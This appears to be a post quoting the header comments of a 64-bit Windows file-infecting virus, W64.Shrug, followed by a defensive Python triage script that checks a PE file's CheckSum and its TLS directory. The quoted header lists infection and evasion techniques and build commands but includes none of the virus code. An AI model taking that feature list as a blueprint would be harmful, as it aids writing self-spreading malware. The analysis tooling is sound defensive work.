One of them is an interesting piece of 64-bit assembly, built with the YASM assembler:
;W64.Shrug by roy g biv
;
;some of its features:
;- parasitic direct action infector of PE exe/dll (but not looking at suffix)
;- infects files in current directory and all subdirectories
;- directory traversal is linked-list instead of recursive to reduce stack size
;- reloc section inserter/last section appender
;- EPO (TLS infection)
;- code executes after ExitProcess() is called
;- uses CRCs instead of API names
;- uses SEH for common code exit
;- no infect files with data outside of image (eg self-extractors)
;- no infect files protected by SFC
;- infected files are padded by random amounts to confuse tail scanners
;- scans memory to find kernel address (no hard-coded addresses)
;- correct file checksum without using imagehlp.dll :) 100% correct algorithm
;---
;
; optimisation tip: Windows appends ".dll" automatically, so this works:
; push "cfs"
; mov ecx, esp
; call LoadLibraryA
;---
;
;to build this thing:
;yasm
;----
;yasm -m amd64 -f win32 -o shrug64.obj shrug64.asm
;link shrug64.obj kernel32.lib user32.lib /section:.text,erw /entry:shrug /subsystem:console
;---
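An added note for anyone triaging samples with the traits listed above (this script is mine, not part of the original post or of the quoted source): two of the features are cheap to check from the analyst's side. The PE CheckSum the header brags about is the documented algorithm (a 16-bit one's-complement sum over the whole file, skipping the CheckSum field itself, plus the file length), so it can be recomputed and compared with the stored value; and a TLS-callback entry point only works if the image carries a populated TLS data directory (IMAGE_DIRECTORY_ENTRY_TLS, index 9), which is visible without executing anything. The names `pe_checksum`, `parse_headers`, `analyze_pe`, `with_correct_checksum` and `build_sample_pe` are my own, and the sample image is a constructed, headers-only PE32+ buffer rather than a real binary.

```python
import struct

# Data directory index of the TLS directory (IMAGE_DIRECTORY_ENTRY_TLS in winnt.h).
IMAGE_DIRECTORY_ENTRY_TLS = 9


def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """Recompute the PE CheckSum the way CheckSumMappedFile does: a 16-bit
    one's-complement sum of the file, excluding the 4-byte CheckSum field,
    plus the file length."""
    padded = data + b"\x00" * (len(data) % 2)  # odd trailing byte is the low byte of a word
    total = 0
    for i in range(0, len(padded), 2):
        if i == checksum_offset or i == checksum_offset + 2:
            continue  # the stored field is excluded from its own sum
        total += padded[i] | (padded[i + 1] << 8)
        total = (total & 0xFFFF) + (total >> 16)  # end-around carry
    total = (total & 0xFFFF) + (total >> 16)  # fold any carry left by the last add
    return (total + len(data)) & 0xFFFFFFFF


def parse_headers(data: bytes) -> dict:
    """Locate the optional header fields we need, for PE32 and PE32+ alike."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsections, _, _, _, _, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20  # IMAGE_FILE_HEADER is 20 bytes
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:    # PE32
        n_dirs_off, dirs = opt + 92, opt + 96
    elif magic == 0x20B:  # PE32+
        n_dirs_off, dirs = opt + 108, opt + 112
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    n_dirs = struct.unpack_from("<I", data, n_dirs_off)[0]
    tls_va = tls_size = 0
    if n_dirs > IMAGE_DIRECTORY_ENTRY_TLS:
        tls_va, tls_size = struct.unpack_from("<II", data, dirs + 8 * IMAGE_DIRECTORY_ENTRY_TLS)
    return {
        "machine": machine,
        "sections": nsections,
        "checksum_offset": opt + 64,  # CheckSum sits at +64 in both optional header formats
        "tls_va": tls_va,
        "tls_size": tls_size,
    }


def analyze_pe(data: bytes) -> dict:
    """Triage verdicts: does the stored CheckSum match, and is a TLS directory present?"""
    hdr = parse_headers(data)
    stored = struct.unpack_from("<I", data, hdr["checksum_offset"])[0]
    computed = pe_checksum(data, hdr["checksum_offset"])
    return {
        "checksum_stored": stored,
        "checksum_computed": computed,
        "checksum_is_zero": stored == 0,  # normal for many user-mode binaries
        "checksum_matches": stored == computed,
        "has_tls_directory": hdr["tls_va"] != 0 and hdr["tls_size"] != 0,
    }


def with_correct_checksum(data: bytes) -> bytearray:
    """Copy of the image with the CheckSum field set to the recomputed value
    (what link.exe /RELEASE does); used here as a round-trip self-check."""
    out = bytearray(data)
    off = parse_headers(out)["checksum_offset"]
    struct.pack_into("<I", out, off, pe_checksum(out, off))
    return out


def build_sample_pe(with_tls: bool = False) -> bytearray:
    """Constructed headers-only PE32+ buffer for the demo; not a runnable program."""
    e_lfanew = 0x40
    img = bytearray(e_lfanew)
    img[:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, e_lfanew)
    img += b"PE\0\0"
    # IMAGE_FILE_HEADER: x64, no sections, 240-byte optional header,
    # Characteristics = EXECUTABLE_IMAGE | LARGE_ADDRESS_AWARE
    img += struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, 240, 0x0022)
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)  # PE32+ magic
    struct.pack_into("<I", opt, 108, 16)   # NumberOfRvaAndSizes
    if with_tls:
        # Constructed TLS directory entry; the RVA and size are placeholders.
        struct.pack_into("<II", opt, 112 + 8 * IMAGE_DIRECTORY_ENTRY_TLS, 0x3000, 0x28)
    img += opt
    img += b"\x00" * (0x200 - len(img))  # pad to a 512-byte header block
    return img


if __name__ == "__main__":
    for name, sample in (("plain", build_sample_pe()), ("tls", build_sample_pe(with_tls=True))):
        print(name, analyze_pe(with_correct_checksum(sample)))
```

Read the results as signals, not verdicts: a zero CheckSum is what most user-mode linkers emit unless asked otherwise, a mismatch only says the file was changed after the field was last written, and a correct value proves nothing at all (the header above makes exactly that point). Likewise a TLS directory is legitimate in any binary that uses thread-local storage; its value to the analyst is that it names the callbacks that run before the official entry point, so they are the first place to look when the visible entry point looks untouched.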